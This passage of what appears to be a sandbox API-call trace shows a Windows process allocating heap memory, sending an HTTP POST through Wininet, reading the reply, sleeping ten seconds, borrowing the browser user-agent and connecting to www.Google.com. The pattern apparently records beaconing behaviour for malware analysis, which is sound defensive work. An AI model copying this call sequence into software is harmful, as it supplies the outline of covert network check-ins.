(HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f46a8 [0159.565] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0159.565] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f46d8 [0159.565] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f46a8 | out: hHeap=0x4780000) returned 1 [0159.565] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x47dea58 [0159.565] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f46d8 | out: hHeap=0x4780000) returned 1 [0159.565] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47f46a8 [0159.565] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9be0 [0159.565] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9be0 | out: hHeap=0x4780000) returned 1 [0159.565] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47dea58 | out: hHeap=0x4780000) returned 1 [0159.565] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9be0 [0159.566] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0159.566] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce720 [0159.566] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6f0 [0159.566] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce720 | out: hHeap=0x4780000) returned 1 [0159.566] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce600 [0159.566] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0159.566] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0159.566] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0159.566] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0159.566] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0159.566] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f4810 [0159.566] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0159.566] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f46d8 [0159.566] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4810 | out: hHeap=0x4780000) returned 1 [0159.566] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x47dea38 [0159.566] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f46d8 | out: hHeap=0x4780000) returned 1 [0159.566] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47f46d8 [0159.566] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9c58 [0159.567] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9c58 | out: hHeap=0x4780000) returned 1 [0159.567] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47dea38 | out: hHeap=0x4780000) returned 1 [0159.567] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0159.568] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0159.568] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5b0 [0159.568] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0159.568] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce720 [0159.568] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0159.568] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0159.568] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce720 | out: hHeap=0x4780000) returned 1 [0159.568] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0159.568] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0159.568] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f4720 [0159.568] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0159.568] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f4750 [0159.568] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4720 | out: hHeap=0x4780000) returned 1 [0159.568] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x47de7b8 [0159.568] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4750 | out: hHeap=0x4780000) returned 1 [0159.568] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47f9c58 [0159.568] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47de7b8 | out: hHeap=0x4780000) returned 1 [0159.568] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbef0 [0159.568] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9c58 | out: hHeap=0x4780000) returned 1 [0159.568] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9c08 [0159.568] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0159.568] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9cf8 [0159.569] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0159.569] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbef0 | out: hHeap=0x4780000) returned 1 [0159.569] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0159.569] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0159.570] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9cf8 | out: hHeap=0x4780000) returned 1 [0159.570] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce680 [0159.570] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce690 [0159.570] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0159.570] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6c0 [0159.570] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0159.570] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce660 [0159.570] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0159.570] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5d0 [0159.570] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce660 | out: hHeap=0x4780000) returned 1 [0159.570] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f4720 [0159.570] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5d0 | out: hHeap=0x4780000) returned 1 [0159.570] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f4810 [0159.570] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4720 | out: hHeap=0x4780000) returned 1 [0159.570] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x47de7b8 [0159.570] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4810 | out: hHeap=0x4780000) returned 1 [0159.570] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47f9c80 [0159.570] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47de7b8 | out: hHeap=0x4780000) returned 1 [0159.570] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0159.570] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9c80 | out: hHeap=0x4780000) returned 1 [0159.571] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9938 [0159.571] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0159.571] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9820 [0159.571] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0159.571] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0159.572] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0159.572] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="", dwHeadersLength=0x0, lpOptional=0x68ab421f*, dwOptionalLength=0x0) returned 1 [0159.764] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9820 | out: hHeap=0x4780000) returned 1 [0159.764] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5c0 [0159.764] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6f0 [0159.765] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0159.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5d0 [0159.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6a0 [0159.765] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5d0 | out: hHeap=0x4780000) returned 1 [0159.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce740 [0159.765] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0159.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce660 [0159.765] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0159.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5d0 [0159.765] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce660 | out: hHeap=0x4780000) returned 1 [0159.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f4750 [0159.765] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5d0 | out: hHeap=0x4780000) returned 1 [0159.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f4810 [0159.765] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4750 | out: hHeap=0x4780000) returned 1 [0159.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x47986b0 [0159.766] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4810 | out: hHeap=0x4780000) returned 1 [0159.766] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47f9c58 [0159.766] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47986b0 | out: hHeap=0x4780000) returned 1 [0159.766] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb9b0 [0159.766] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9c58 | out: hHeap=0x4780000) returned 1 [0159.766] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9cf8 [0159.766] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0159.766] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9c58 [0159.766] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0159.766] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb9b0 | out: hHeap=0x4780000) returned 1 [0159.767] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0159.767] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x400) returned 1 [0159.767] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9c58 | out: hHeap=0x4780000) returned 1 [0159.767] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x410) returned 0x480abe8 [0159.767] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x810) returned 0x480ba28 [0159.767] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ba28 | out: hHeap=0x4780000) returned 1 [0159.768] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480abe8 | out: hHeap=0x4780000) returned 1 [0159.768] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0159.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce690 [0159.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5d0 [0159.768] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0159.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce600 [0159.768] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5d0 | out: hHeap=0x4780000) returned 1 [0159.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0159.768] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0159.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce640 [0159.768] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0159.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f4810 [0159.768] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0159.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f4750 [0159.768] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4810 | out: hHeap=0x4780000) returned 1 [0159.769] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x47986b0 [0159.769] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4750 | out: hHeap=0x4780000) returned 1 [0159.769] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47f9870 [0159.769] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47986b0 | out: hHeap=0x4780000) returned 1 [0159.769] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbd68 [0159.769] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9870 | out: hHeap=0x4780000) returned 1 [0159.769] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9820 [0159.769] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0159.769] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9c58 [0159.769] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0159.769] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0159.770] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0159.770] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x235) returned 1 [0159.770] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9c58 | out: hHeap=0x4780000) returned 1 [0159.770] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x240) returned 0x480a0b0 [0159.770] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x470) returned 0x480abe8 [0159.771] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480abe8 | out: hHeap=0x4780000) returned 1 [0159.771] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480a0b0 | out: hHeap=0x4780000) returned 1 [0159.771] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0159.771] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6e0 [0159.771] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce750 [0159.772] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0159.772] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce720 [0159.772] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0159.772] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0159.772] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce720 | out: hHeap=0x4780000) returned 1 [0159.772] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce660 [0159.772] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0159.772] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f4780 [0159.772] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce660 | out: hHeap=0x4780000) returned 1 [0159.772] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f4810 [0159.772] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4780 | out: hHeap=0x4780000) returned 1 [0159.772] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x47986b0 [0159.772] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4810 | out: hHeap=0x4780000) returned 1 [0159.772] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47f9c58 [0159.772] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47986b0 | out: hHeap=0x4780000) returned 1 [0159.772] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc18 [0159.772] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9c58 | out: hHeap=0x4780000) returned 1 [0159.773] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9c58 [0159.773] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0159.773] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9848 [0159.773] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0159.773] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc18 | out: hHeap=0x4780000) returned 1 [0159.774] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0159.774] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0159.774] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9848 | out: hHeap=0x4780000) returned 1 [0159.774] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0159.774] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0159.774] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0159.774] FreeLibrary (hLibModule=0x71570000) returned 1 [0159.775] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0159.775] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0159.775] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9be0 | out: hHeap=0x4780000) returned 1 [0159.775] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9bb8 | out: hHeap=0x4780000) returned 1 [0159.775] Sleep (dwMilliseconds=0x2710) [0169.800] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce620 [0169.800] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce690 [0169.800] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0169.800] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce720 [0169.801] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0169.801] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0169.801] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce720 | out: hHeap=0x4780000) returned 1 [0169.801] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce600 [0169.801] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0169.801] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f4810 [0169.801] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0169.801] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f4690 [0169.801] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4810 | out: hHeap=0x4780000) returned 1 [0169.801] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x47986b0 [0169.801] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4690 | out: hHeap=0x4780000) returned 1 [0169.801] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47f4810 [0169.801] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9848 [0169.802] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9848 | out: hHeap=0x4780000) returned 1 [0169.802] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47986b0 | out: hHeap=0x4780000) returned 1 [0169.802] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9bb8 [0169.802] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0169.803] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6b0 [0169.803] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0169.803] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0169.803] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce720 [0169.803] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0169.803] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6f0 [0169.803] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce720 | out: hHeap=0x4780000) returned 1 [0169.803] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6b0 [0169.803] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0169.803] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f4690 [0169.803] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0169.803] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f46f0 [0169.803] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4690 | out: hHeap=0x4780000) returned 1 [0169.803] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x47986b0 [0169.803] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f46f0 | out: hHeap=0x4780000) returned 1 [0169.803] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47f9be0 [0169.804] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47986b0 | out: hHeap=0x4780000) returned 1 [0169.804] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba90 [0169.804] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9be0 | out: hHeap=0x4780000) returned 1 [0169.804] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9be0 [0169.804] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0169.804] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9848 [0169.805] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0169.805] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba90 | out: hHeap=0x4780000) returned 1 [0169.805] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0169.806] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0169.806] FreeLibrary (hLibModule=0x71780000) returned 1 [0169.807] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9848 | out: hHeap=0x4780000) returned 1 [0169.807] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0169.808] InternetConnectA (hInternet=0xcc0004, lpszServerName="www.Google.com", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0169.810] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce750 [0169.810] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0169.810] HeapFree (in: hHeap=0x4780000, 